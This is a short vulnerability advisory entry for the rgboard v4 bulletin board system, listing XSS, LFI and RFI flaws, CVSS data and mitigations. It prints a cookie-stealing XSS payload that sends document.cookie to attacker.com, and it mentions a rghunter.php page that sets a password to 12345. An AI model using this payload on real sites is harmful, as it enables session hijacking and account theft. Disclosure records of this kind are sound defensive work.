vendor:
rgboard
by:
make0day@gmail.com
8.8
CVSS
HIGH
XSS, LFI, RFI
79, 22, 639
CWE
Product Name: rgboard
Affected Version From: rgboard v4 (07.07.27)
Affected Version To: rgboard v4 (07.07.27)
Patch Exists: Yes
Related CWE: N/A
CPE: a:rgboard:rgboard:4
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: PHP and MySQL
Unknown
rgboard v4 5p1 (07.07.27) Multiple Vulnerability
rgboard (VERSION v4 (07.07.27)) is widely used bulletin board system of Korea. It is freely available for all platforms that supports PHP and MySQL. But I find a XSS vuln, LFI vuln and RFI vuln. Inject XSS tag: <img src = "http://attacker.com" onError="window.location='http://attacker.com/c.php?c='+document.cookie+'&l='+window.location">Hi there! :) /rghunter.php - Makes password as 12345
Mitigation:
Input validation, Access control, File integrity monitoring